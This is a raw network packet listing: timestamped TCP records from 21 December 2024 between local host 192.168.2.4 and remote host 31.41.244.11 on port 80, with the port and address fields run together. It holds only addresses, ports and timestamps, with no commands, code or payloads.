                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.681938887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.682857990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.682909966 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.682934999 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.682981968 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.683749914 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.683798075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.683887959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.683933020 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.684750080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.684797049 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.684900999 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.684948921 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.685746908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.685796022 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.685900927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.685945034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.686753988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.686808109 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.686885118 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.686937094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.687760115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.687807083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.687885046 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.687931061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.688733101 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.688782930 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.688905001 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.688956976 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.689918041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.689970016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.690047026 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.690093994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.690784931 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.690834045 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.690958977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.691008091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.691771984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.691824913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.691920042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.691968918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.692800999 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.692853928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.692919016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.692966938 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.693770885 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.693825006 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.694030046 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.694083929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.694766998 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.694818020 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.694895029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.694941998 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.695755959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.695801973 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.695918083 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.695965052 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.696774960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.696822882 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.696947098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.696997881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.697849035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.697897911 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.697978020 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.698029995 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.698765993 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.698826075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.698981047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.699050903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.699740887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.699794054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.699907064 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.699963093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.700756073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.700808048 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.700887918 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.700937033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.701764107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.701817036 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.701920033 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.701968908 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.702737093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.702796936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.702889919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.702970982 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.703867912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.703922033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.704066992 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.704111099 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.704931021 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.704983950 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.705050945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.705112934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.705795050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.705845118 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.705954075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.706003904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.706852913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.706908941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.706985950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.707031012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.707858086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.707916021 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.707979918 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.708031893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.708760977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.708812952 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.708918095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.709021091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.709801912 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.709858894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.709983110 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.710033894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.710803032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.710856915 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.710922003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.710973024 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.711771011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.711827040 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.711905003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.711955070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.712791920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.712845087 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.712923050 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.712971926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.713794947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.713848114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.713927031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.713975906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.714797974 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.714863062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.714947939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.714997053 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.715816975 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.715867996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.715945959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.715996981 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.716773987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.716830015 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.716968060 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.717017889 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.717780113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.717833042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.717911959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.717961073 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.718774080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.718828917 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.718951941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.719048023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.719826937 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.719882965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.720010042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.720066071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.720753908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.720808983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.860471010 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.860569954 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.860630989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.860888958 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.860946894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.861069918 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.861176014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.861943007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.861996889 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.862365961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.862423897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.862484932 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.862539053 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.863279104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.863430023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.863497972 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.864247084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.864300966 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.864378929 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.864433050 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.865308046 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.865370035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.865448952 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.865564108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.866265059 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.866313934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.866390944 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.866451025 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.867240906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.867290020 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.867403984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.867459059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.868258953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.868410110 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.868458986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.869445086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.869501114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.869520903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.869574070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.870251894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.870310068 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.870462894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.870513916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.871282101 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.871339083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.871403933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.871447086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.872324944 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.872375011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.872407913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.872456074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.873279095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.873328924 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.873392105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.873445034 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.874317884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.874368906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.874452114 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.874504089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.875288010 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.875345945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.875399113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.875452042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.876262903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.876317024 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.876385927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.876440048 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.877260923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.877312899 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.877424002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.877475023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.878271103 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.878324032 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.878403902 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.878453016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.879287004 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.879345894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.879513025 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.879563093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.880289078 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.880342007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.880395889 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.880635023 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.881268978 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.881324053 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.881403923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.881464958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.882277012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.882338047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.882416964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.882477999 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.883502007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.883552074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.883569956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.883677959 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.884272099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.884325027 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.884402990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.884452105 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.885283947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.885333061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.885469913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.885519981 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.886301994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.886584997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.886615992 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.886630058 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.887260914 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.887443066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.887491941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.888281107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.888330936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.888394117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.888437986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.889280081 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.889329910 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:13.889419079 CET804977031.41.244.11192.168.2.4
